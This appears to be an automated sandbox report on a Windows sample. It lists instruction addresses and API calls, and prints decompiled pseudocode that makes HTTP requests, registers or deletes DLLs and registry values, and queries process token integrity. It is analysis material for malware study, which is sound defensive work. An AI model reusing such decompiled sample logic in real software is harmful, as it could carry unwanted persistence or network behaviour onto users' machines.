                                                                                                                                                                    0x004c2884
                                                                                                                                                                    0x004c2886
                                                                                                                                                                    0x004c2886
                                                                                                                                                                    0x004c288a
                                                                                                                                                                    0x004c2891
                                                                                                                                                                    0x004c2896
                                                                                                                                                                    0x004c2898
                                                                                                                                                                    0x004c289a
                                                                                                                                                                    0x004c28ab
                                                                                                                                                                    0x004c28b0
                                                                                                                                                                    0x004c28b0
                                                                                                                                                                    0x004c28b3
                                                                                                                                                                    0x004c28b5
                                                                                                                                                                    0x004c28bb
                                                                                                                                                                    0x004c28c3
                                                                                                                                                                    0x004c28cb
                                                                                                                                                                    0x004c28d0
                                                                                                                                                                    0x004c28d3
                                                                                                                                                                    0x004c28d5
                                                                                                                                                                    0x004c28db
                                                                                                                                                                    0x004c28ea
                                                                                                                                                                    0x004c28ef
                                                                                                                                                                    0x004c28ef
                                                                                                                                                                    0x004c28f6
                                                                                                                                                                    0x004c28fe
                                                                                                                                                                    0x004c28fe
                                                                                                                                                                    0x004c290c
                                                                                                                                                                    0x004c2914
                                                                                                                                                                    0x004c2919
                                                                                                                                                                    0x004c291b
                                                                                                                                                                    0x004c2929
                                                                                                                                                                    0x004c292e
                                                                                                                                                                    0x004c292e
                                                                                                                                                                    0x004c2931
                                                                                                                                                                    0x004c2939
                                                                                                                                                                    0x004c2944
                                                                                                                                                                    0x004c2949
                                                                                                                                                                    0x004c294c
                                                                                                                                                                    0x004c294f
                                                                                                                                                                    0x004c295d
                                                                                                                                                                    0x004c2961
                                                                                                                                                                    0x004c2962
                                                                                                                                                                    0x004c2964
                                                                                                                                                                    0x004c2968
                                                                                                                                                                    0x004c296e
                                                                                                                                                                    0x004c296e
                                                                                                                                                                    0x004c2970
                                                                                                                                                                    0x004c2974
                                                                                                                                                                    0x004c2976
                                                                                                                                                                    0x004c2978
                                                                                                                                                                    0x004c297d
                                                                                                                                                                    0x004c2980
                                                                                                                                                                    0x004c2980
                                                                                                                                                                    0x004c297d
                                                                                                                                                                    0x004c2986
                                                                                                                                                                    0x004c298b
                                                                                                                                                                    0x004c2992
                                                                                                                                                                    0x004c2998
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c2998
                                                                                                                                                                    0x004c2813
                                                                                                                                                                    0x004c2770
                                                                                                                                                                    0x004c2776
                                                                                                                                                                    0x004c2780
                                                                                                                                                                    0x004c2780
                                                                                                                                                                    0x004c2787
                                                                                                                                                                    0x00000000

APIs
• CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,?,00000008,?,00000001,?,005175FC,000000FF,004C5BE5), ref: 004C271A
• WaitForSingleObject.KERNEL32(00000000,00001388,00000008,?,?,00000005,?,?,?), ref: 004C2739
  • Part of subcall function 004C4B10: RegCloseKey.ADVAPI32(000000FF,?,?,?,?,00000008,?,?,00000005,?,?,?), ref: 004C4B68
• RegCloseKey.ADVAPI32(80000001), ref: 004C2780
• ReleaseMutex.KERNEL32(00000000), ref: 004C2787
• CloseHandle.KERNEL32(00000000), ref: 004C278E
• RegCloseKey.ADVAPI32(?), ref: 004C2980
• ReleaseMutex.KERNEL32(?), ref: 004C298B
• CloseHandle.KERNEL32(?), ref: 004C2992
Strings
Memory Dump Source
• Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
• Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
• Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
• Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
• Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
Similarity
• API ID: Close$Mutex$HandleRelease$CreateObjectSingleWait
• String ID: %s=%s$%s?%s$&%s$&%s=%s$/tools/pso/ping$brand$pinyin${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
• API String ID: 3553343216-3469552700
• Opcode ID: 6345db18bfc4a35dd045dab51f467e82da2d6009c8ca5b5c8ff4f281d30af730
• Instruction ID: 659416fc5c69159fdcabd868b00f6c6f9f86b909beca29153fccabfe5cb85a3f
• Opcode Fuzzy Hash: 6345db18bfc4a35dd045dab51f467e82da2d6009c8ca5b5c8ff4f281d30af730
• Instruction Fuzzy Hash: 177158392483409BD360EB22DD41FDBB7D4BF99304F04491EF88897391DBB99909CB9A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%
                                                                                                                                                                    			E00457510(WCHAR** __ecx, WCHAR* __edx, void* __ebp, long _a4, intOrPtr* _a8) {
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				long _v36;
                                                                                                                                                                    				char _v68;
                                                                                                                                                                    				char _v108;
                                                                                                                                                                    				long _v544;
                                                                                                                                                                    				intOrPtr* _v552;
                                                                                                                                                                    				void* _v568;
                                                                                                                                                                    				void* _v596;
                                                                                                                                                                    				long _v624;
                                                                                                                                                                    				void _v640;
                                                                                                                                                                    				void _v648;
                                                                                                                                                                    				intOrPtr* _v656;
                                                                                                                                                                    				WCHAR* _v660;
                                                                                                                                                                    				long _v664;
                                                                                                                                                                    				long _v668;
                                                                                                                                                                    				long _v680;
                                                                                                                                                                    				WCHAR* _v684;
                                                                                                                                                                    				long _v696;
                                                                                                                                                                    				char _v700;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                    				void* _t54;
                                                                                                                                                                    				void* _t65;
                                                                                                                                                                    				void* _t79;
                                                                                                                                                                    				long _t84;
                                                                                                                                                                    				void* _t89;
                                                                                                                                                                    				void* _t91;
                                                                                                                                                                    				long _t94;
                                                                                                                                                                    				void* _t95;
                                                                                                                                                                    				long _t106;
                                                                                                                                                                    				intOrPtr _t114;
                                                                                                                                                                    				WCHAR** _t116;
                                                                                                                                                                    				void* _t117;
                                                                                                                                                                    				void* _t119;
                                                                                                                                                                    				void* _t125;
                                                                                                                                                                    				void* _t127;
                                                                                                                                                                    				long _t129;
                                                                                                                                                                    				void* _t132;
                                                                                                                                                                    				signed int _t133;
                                                                                                                                                                    
                                                                                                                                                                    				_t113 = __edx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(0x50fe21);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				_t133 = _t132 - 0x228;
                                                                                                                                                                    				_t48 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_v16 = _t48 ^ _t133;
                                                                                                                                                                    				_t50 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_push(_t50 ^ _t133);
                                                                                                                                                                    				 *[fs:0x0] =  &_v12;
                                                                                                                                                                    				_t129 = _a4;
                                                                                                                                                                    				_t53 = _a8;
                                                                                                                                                                    				_t94 = 0;
                                                                                                                                                                    				_t116 = __ecx;
                                                                                                                                                                    				_v544 = _t129;
                                                                                                                                                                    				_v552 = _t53;
                                                                                                                                                                    				if(_t129 != 0) {
                                                                                                                                                                    					if(_t53 == 0) {
                                                                                                                                                                    						goto L1;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						E00457850(_t129);
                                                                                                                                                                    						 *_v552 = 0;
                                                                                                                                                                    						if(_t116[4] != 0) {
                                                                                                                                                                    							L7:
                                                                                                                                                                    							_t113 = _t116[4];
                                                                                                                                                                    							_t127 = InternetConnectW(_t116[4],  *_t116, _t116[1] & 0x0000ffff, _t94, _t94, 3, _t94, _t94);
                                                                                                                                                                    							_v568 = _t127;
                                                                                                                                                                    							_v36 = _t94;
                                                                                                                                                                    							if(_t127 == _t94) {
                                                                                                                                                                    								goto L6;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t106 = 0x400300;
                                                                                                                                                                    								if(_t116[1] == 0x1bb) {
                                                                                                                                                                    									_t106 = 0xc00300;
                                                                                                                                                                    								}
                                                                                                                                                                    								if(_t116[5] == _t94) {
                                                                                                                                                                    									_t106 = _t106 | 0x00080000;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t119 = HttpOpenRequestW(_t127, _t116[2], _t116[3], L"HTTP/1.1", 0x52fc70, _t94, _t106, _t94);
                                                                                                                                                                    								_v596 = _t119;
                                                                                                                                                                    								_v68 = 1;
                                                                                                                                                                    								if(_t119 != _t94) {
                                                                                                                                                                    									if(HttpSendRequestW(_t119, _t94, _t94, _t94, _t94) != 0) {
                                                                                                                                                                    										_v640 = _t94;
                                                                                                                                                                    										_v624 = 4;
                                                                                                                                                                    										if(HttpQueryInfoW(_t119, 0x20000013,  &_v640,  &_v624, _t94) == 0) {
                                                                                                                                                                    											goto L15;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											_t114 =  *0x559000; // 0x521840
                                                                                                                                                                    											_t24 = _t114 + 0xc; // 0x4edeb4
                                                                                                                                                                    											_v668 =  *((intOrPtr*)( *_t24))() + 0x10;
                                                                                                                                                                    											_v108 = 2;
                                                                                                                                                                    											if( &(_v660[0xffffffffffffff9c]) > 0x63) {
                                                                                                                                                                    												L27:
                                                                                                                                                                    												L004578B0( &_v668, _t129);
                                                                                                                                                                    												_t113 = _v660;
                                                                                                                                                                    												 *_v656 = _v660;
                                                                                                                                                                    												L004C7B30( &_v668, _v660);
                                                                                                                                                                    												InternetCloseHandle(_t119);
                                                                                                                                                                    												InternetCloseHandle(_t127);
                                                                                                                                                                    												_t54 = 0;
                                                                                                                                                                    											} else {
                                                                                                                                                                    												_t113 =  &_v664;
                                                                                                                                                                    												_v664 = _t94;
                                                                                                                                                                    												if(InternetQueryDataAvailable(_t119,  &_v664, _t94, _t94) == 0) {
                                                                                                                                                                    													L25:
                                                                                                                                                                    													_t79 = E004012C0();
                                                                                                                                                                    													L004C7B30( &_v684, _t113);
                                                                                                                                                                    													InternetCloseHandle(_t119);
                                                                                                                                                                    													InternetCloseHandle(_t127);
                                                                                                                                                                    													_t54 = _t79;
                                                                                                                                                                    												} else {
                                                                                                                                                                    													while(1) {
                                                                                                                                                                    														_t84 = _v680;
                                                                                                                                                                    														if(_t84 <= _t94) {
                                                                                                                                                                    															break;
                                                                                                                                                                    														}
                                                                                                                                                                    														_v668 = _t94;
                                                                                                                                                                    														if(_t84 > 0x200) {
                                                                                                                                                                    															_t84 = 0x200;
                                                                                                                                                                    															_v680 = 0x200;
                                                                                                                                                                    														}
                                                                                                                                                                    														_t113 =  &_v648;
                                                                                                                                                                    														if(InternetReadFile(_t119,  &_v648, _t84,  &_v668) != 0) {
                                                                                                                                                                    															_t113 = _v684;
                                                                                                                                                                    															E004577A0( &_v700, _v684,  &_v664);
                                                                                                                                                                    															_t94 = 0;
                                                                                                                                                                    														}
                                                                                                                                                                    														if(InternetQueryDataAvailable(_t119,  &_v696, _t94, _t94) != 0) {
                                                                                                                                                                    															continue;
                                                                                                                                                                    														} else {
                                                                                                                                                                    															goto L25;
                                                                                                                                                                    														}
                                                                                                                                                                    														goto L28;
                                                                                                                                                                    													}
                                                                                                                                                                    													_t129 = _v664;
                                                                                                                                                                    													goto L27;
                                                                                                                                                                    												}
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    									} else {
                                                                                                                                                                    										L15:
                                                                                                                                                                    										_t65 = E004012C0();
                                                                                                                                                                    										InternetCloseHandle(_t119);
                                                                                                                                                                    										InternetCloseHandle(_t127);
                                                                                                                                                                    										_t54 = _t65;
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t89 = E004012C0();
                                                                                                                                                                    									InternetCloseHandle(_t127);
                                                                                                                                                                    									_t54 = _t89;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t91 = InternetOpenW(0, 0, 0, 0, 0);
                                                                                                                                                                    							_t116[4] = _t91;
                                                                                                                                                                    							if(_t91 != 0 || E004012C0() >= 0) {
                                                                                                                                                                    								goto L7;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								L6:
                                                                                                                                                                    								_t54 = E004012C0();
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					L1:
                                                                                                                                                                    					_t54 = 0x80070057;
                                                                                                                                                                    				}
                                                                                                                                                                    				L28:
                                                                                                                                                                    				 *[fs:0x0] = _v12;
                                                                                                                                                                    				_pop(_t117);
                                                                                                                                                                    				_pop(_t125);
                                                                                                                                                                    				_pop(_t95);
                                                                                                                                                                    				return L004EEDC9(_t54, _t95, _v16 ^ _t133, _t113, _t117, _t125);
                                                                                                                                                                    			}


                                                                                                                                                                    APIs
                                                                                                                                                                    • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0045758E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InternetOpen
                                                                                                                                                                    • String ID: HTTP/1.1
                                                                                                                                                                    • API String ID: 2038078732-1626175334
                                                                                                                                                                    • Opcode ID: cb0ba1f9f8daf258a76d99586bb0cde04d1fa742efa321df2f4efc352827d7bb
                                                                                                                                                                    • Instruction ID: 5c2c636e9fcd2c99e18b37509e7f3f13e8b61ccec9910e3602a43117ec4ee666
                                                                                                                                                                    • Opcode Fuzzy Hash: cb0ba1f9f8daf258a76d99586bb0cde04d1fa742efa321df2f4efc352827d7bb
                                                                                                                                                                    • Instruction Fuzzy Hash: EF719075208245AFD320AF65E884E6BB7E8FF99345F00053EF945D3251E738AD09CB6A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                    			E004556D0(WCHAR* __ecx) {
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                    				int _t40;
                                                                                                                                                                    				signed int* _t42;
                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                                                    				void* _t47;
                                                                                                                                                                    				_Unknown_base(*)()* _t59;
                                                                                                                                                                    				void* _t69;
                                                                                                                                                                    				intOrPtr* _t78;
                                                                                                                                                                    				short* _t82;
                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                    				signed short* _t92;
                                                                                                                                                                    				intOrPtr* _t98;
                                                                                                                                                                    				void* _t99;
                                                                                                                                                                    				void* _t100;
                                                                                                                                                                    				void* _t101;
                                                                                                                                                                    				void* _t103;
                                                                                                                                                                    				void* _t105;
                                                                                                                                                                    				void** _t106;
                                                                                                                                                                    				struct HINSTANCE__* _t107;
                                                                                                                                                                    				void* _t109;
                                                                                                                                                                    				signed int _t112;
                                                                                                                                                                    
                                                                                                                                                                    				_t37 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_t38 = _t37 ^ _t112;
                                                                                                                                                                    				 *(_t112 + 0x428) = _t37 ^ _t112;
                                                                                                                                                                    				_t109 =  *(_t112 + 0x438);
                                                                                                                                                                    				_t98 = __ecx;
                                                                                                                                                                    				 *(_t112 + 0x10) = _t109;
                                                                                                                                                                    				if(__ecx == 0) {
                                                                                                                                                                    					L35:
                                                                                                                                                                    					_pop(_t99);
                                                                                                                                                                    					_pop(_t103);
                                                                                                                                                                    					_pop(_t69);
                                                                                                                                                                    					return L004EEDC9(_t38, _t69,  *(_t112 + 0x438) ^ _t112, _t90, _t99, _t103);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t40 = lstrlenW(__ecx);
                                                                                                                                                                    				_t38 = L004F3BE9(_t98, L"/\\*?|\r\n\t \"");
                                                                                                                                                                    				_t112 = _t112 + 8;
                                                                                                                                                                    				if(_t38 != _t40) {
                                                                                                                                                                    					goto L35;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t38 = 0x2e;
                                                                                                                                                                    				if(0x2e ==  *_t98) {
                                                                                                                                                                    					goto L35;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					GetCurrentDirectoryW(0x104, _t112 + 0x224);
                                                                                                                                                                    					_t92 =  *( *((intOrPtr*)(_t109 + 0x18)) + 0x28);
                                                                                                                                                                    					_t105 = 0x105;
                                                                                                                                                                    					_t42 = _t112 + 0x14;
                                                                                                                                                                    					while(1) {
                                                                                                                                                                    						_t8 = _t105 + 0x7ffffef9; // 0x7ffffffe
                                                                                                                                                                    						if(_t8 == 0) {
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t89 =  *_t92 & 0x0000ffff;
                                                                                                                                                                    						if(_t89 == 0) {
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						 *_t42 = _t89;
                                                                                                                                                                    						_t42 =  &(_t42[0]);
                                                                                                                                                                    						_t92 =  &(_t92[1]);
                                                                                                                                                                    						_t105 = _t105 - 1;
                                                                                                                                                                    						if(_t105 != 0) {
                                                                                                                                                                    							continue;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							L9:
                                                                                                                                                                    							_t42 = _t42 - 2;
                                                                                                                                                                    							L10:
                                                                                                                                                                    							_t93 = 0;
                                                                                                                                                                    							 *_t42 = 0;
                                                                                                                                                                    							SetCurrentDirectoryW(_t112 + 0x14);
                                                                                                                                                                    							_t45 = lstrlenW(_t112 + 0x14);
                                                                                                                                                                    							if(_t45 == 0 ||  *((short*)(_t112 + 0x12 + _t45 * 2)) != 0x5c) {
                                                                                                                                                                    								_t93 = 0x105;
                                                                                                                                                                    								_t46 = _t112 + 0x14;
                                                                                                                                                                    								while( *_t46 != 0) {
                                                                                                                                                                    									_t46 = _t46 + 2;
                                                                                                                                                                    									_t93 = _t93 - 1;
                                                                                                                                                                    									if(_t93 != 0) {
                                                                                                                                                                    										continue;
                                                                                                                                                                    									}
                                                                                                                                                                    									goto L18;
                                                                                                                                                                    								}
                                                                                                                                                                    								if(_t93 != 0) {
                                                                                                                                                                    									_t87 = 0x105 - _t93;
                                                                                                                                                                    									_t93 = 0x7fffffff;
                                                                                                                                                                    									L00453A00(0, _t112 + 0x18 + _t87 * 2, 0x7fffffff, "\\");
                                                                                                                                                                    								}
                                                                                                                                                                    								goto L18;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								L18:
                                                                                                                                                                    								_t47 = 0x105;
                                                                                                                                                                    								_t78 = _t112 + 0x14;
                                                                                                                                                                    								while( *_t78 != 0) {
                                                                                                                                                                    									_t78 = _t78 + 2;
                                                                                                                                                                    									_t47 = _t47 - 1;
                                                                                                                                                                    									if(_t47 != 0) {
                                                                                                                                                                    										continue;
                                                                                                                                                                    									}
                                                                                                                                                                    									L24:
                                                                                                                                                                    									_t100 =  *(_t112 + 0x10);
                                                                                                                                                                    									if(L00454EA0(_t112 + 0x14, _t93, _t100) == 0) {
                                                                                                                                                                    										_t106 =  *(_t100 + 0x18);
                                                                                                                                                                    										_t101 = _t106[0x12];
                                                                                                                                                                    										if(_t101 != 0) {
                                                                                                                                                                    											_push( *((intOrPtr*)(_t101 + 0x10)));
                                                                                                                                                                    											E004EF7B8();
                                                                                                                                                                    											_push(_t101);
                                                                                                                                                                    											L004EEDBE();
                                                                                                                                                                    											_t112 = _t112 + 8;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t106[0x12] = 0;
                                                                                                                                                                    										 *((intOrPtr*)(_t112 + 0x34)) = 0;
                                                                                                                                                                    										if(RegCreateKeyExW( *_t106, _t106[1], 0, 0, 0, 0x20006, 0, _t112 + 0x14, 0) == 0) {
                                                                                                                                                                    											_t82 =  *0x55b1f8; // 0x53421c
                                                                                                                                                                    											RegDeleteValueW( *(_t112 + 0x10), _t82);
                                                                                                                                                                    											RegCloseKey( *(_t112 + 0x10));
                                                                                                                                                                    										}
                                                                                                                                                                    										DeleteFileW(_t112 + 0x14);
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t107 = LoadLibraryW(_t112 + 0x14);
                                                                                                                                                                    										if(_t107 != 0) {
                                                                                                                                                                    											_t59 = GetProcAddress(_t107, "DllRegisterServer");
                                                                                                                                                                    											if(_t59 != 0) {
                                                                                                                                                                    												 *_t59();
                                                                                                                                                                    											}
                                                                                                                                                                    											FreeLibrary(_t107);
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    									_t90 = _t112 + 0x224;
                                                                                                                                                                    									_t38 = SetCurrentDirectoryW(_t112 + 0x224);
                                                                                                                                                                    									goto L35;
                                                                                                                                                                    								}
                                                                                                                                                                    								if(_t47 != 0) {
                                                                                                                                                                    									_t93 = 0x7fffffff;
                                                                                                                                                                    									L00453A00(0, _t112 + 0x18 + (0x105 - _t47) * 2, 0x7fffffff, _t98);
                                                                                                                                                                    								}
                                                                                                                                                                    								goto L24;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_t105 != 0) {
                                                                                                                                                                    						goto L10;
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L9;
                                                                                                                                                                    				}
                                                                                                                                                                    			}





























                                                                                                                                                                    0x004557b2
                                                                                                                                                                    0x004557b6
                                                                                                                                                                    0x004557bd
                                                                                                                                                                    0x004557cf
                                                                                                                                                                    0x004557d4
                                                                                                                                                                    0x004557d4
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004557d9
                                                                                                                                                                    0x004557d9
                                                                                                                                                                    0x004557d9
                                                                                                                                                                    0x004557de
                                                                                                                                                                    0x004557e2
                                                                                                                                                                    0x004557e7
                                                                                                                                                                    0x004557ea
                                                                                                                                                                    0x004557eb
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00455810
                                                                                                                                                                    0x00455810
                                                                                                                                                                    0x0045581f
                                                                                                                                                                    0x00455851
                                                                                                                                                                    0x00455854
                                                                                                                                                                    0x00455859
                                                                                                                                                                    0x0045585e
                                                                                                                                                                    0x0045585f
                                                                                                                                                                    0x00455864
                                                                                                                                                                    0x00455865
                                                                                                                                                                    0x0045586a
                                                                                                                                                                    0x0045586a
                                                                                                                                                                    0x00455883
                                                                                                                                                                    0x00455886
                                                                                                                                                                    0x00455892
                                                                                                                                                                    0x00455894
                                                                                                                                                                    0x004558a0
                                                                                                                                                                    0x004558ab
                                                                                                                                                                    0x004558ab
                                                                                                                                                                    0x004558b6
                                                                                                                                                                    0x00455821
                                                                                                                                                                    0x0045582c
                                                                                                                                                                    0x00455830
                                                                                                                                                                    0x0045583c
                                                                                                                                                                    0x00455844
                                                                                                                                                                    0x00455846
                                                                                                                                                                    0x00455846
                                                                                                                                                                    0x00455849
                                                                                                                                                                    0x00455849
                                                                                                                                                                    0x00455830
                                                                                                                                                                    0x004558bc
                                                                                                                                                                    0x004558c4
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004558c4
                                                                                                                                                                    0x004557f1
                                                                                                                                                                    0x00455806
                                                                                                                                                                    0x0045580b
                                                                                                                                                                    0x0045580b
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004557f1
                                                                                                                                                                    0x00455794
                                                                                                                                                                    0x0045576c
                                                                                                                                                                    0x00455772
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00455772

                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?), ref: 00455704
                                                                                                                                                                    • _wcscspn.LIBCMT ref: 0045570E
                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00455739
                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00455787
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0045578E
                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00455826
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 0045583C
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00455849
                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0045588A
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,0053421C), ref: 004558A0
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004558AB
                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004558B6
                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004558C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentDirectory$DeleteLibrarylstrlen$AddressCloseCreateFileFreeLoadProcValue_wcscspn
                                                                                                                                                                    • String ID: /\*?| "$DllRegisterServer$\
                                                                                                                                                                    • API String ID: 845541531-2510004300
                                                                                                                                                                    • Opcode ID: d63e16144128a6228ccd71559f1d155f94567208f285e329e2a4568be9b551b9
                                                                                                                                                                    • Instruction ID: 196b6e435319e0d2fb4ef869fc93a8ab4e7dbe8f5c03193b39a64d6980165c70
                                                                                                                                                                    • Opcode Fuzzy Hash: d63e16144128a6228ccd71559f1d155f94567208f285e329e2a4568be9b551b9
                                                                                                                                                                    • Instruction Fuzzy Hash: 5F51E372500B01DBC320EF65D8A597B73A5EFA8712F54092EF94287241E738ED4DCB6A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                    			E004C7400(void* __edx, void* __eflags, void* _a4) {
                                                                                                                                                                    				long _v4;
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				long _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				void* _v24;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t21;
                                                                                                                                                                    				void* _t22;
                                                                                                                                                                    				void* _t31;
                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                    				void* _t35;
                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                    				void* _t40;
                                                                                                                                                                    				void* _t45;
                                                                                                                                                                    				signed char _t56;
                                                                                                                                                                    				void* _t58;
                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                    				void* _t61;
                                                                                                                                                                    				void* _t62;
                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                    
                                                                                                                                                                    				 *0x55ffa0 = 0;
                                                                                                                                                                    				if(E004C76D0(_t45, __edx, _t58, _t61) != 0) {
                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                    					if(OpenProcessToken(_a4, 0x18,  &_v8) != 0) {
                                                                                                                                                                    						SetLastError(0);
                                                                                                                                                                    						_v4 = 0;
                                                                                                                                                                    						GetTokenInformation(_v8, 0x19, 0, 0,  &_v4);
                                                                                                                                                                    						if(GetLastError() == 0x7a) {
                                                                                                                                                                    							_t21 = _v8;
                                                                                                                                                                    							if(0 > 0 || 0 >= 0 && _t21 > 0xffffffff) {
                                                                                                                                                                    								L15:
                                                                                                                                                                    								__imp__CoTaskMemFree(0);
                                                                                                                                                                    								_t22 = _v16;
                                                                                                                                                                    								if(_t22 != 0) {
                                                                                                                                                                    									CloseHandle(_t22);
                                                                                                                                                                    								}
                                                                                                                                                                    								return 0x8007000e;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								__imp__CoTaskMemAlloc(_t21);
                                                                                                                                                                    								_t62 = _t21;
                                                                                                                                                                    								if(_t62 != 0) {
                                                                                                                                                                    									if(GetTokenInformation(_v16, 0x19, _t62, _v12,  &_v12) != 0) {
                                                                                                                                                                    										_t56 =  *(GetSidSubAuthorityCount( *_t62)) - 1;
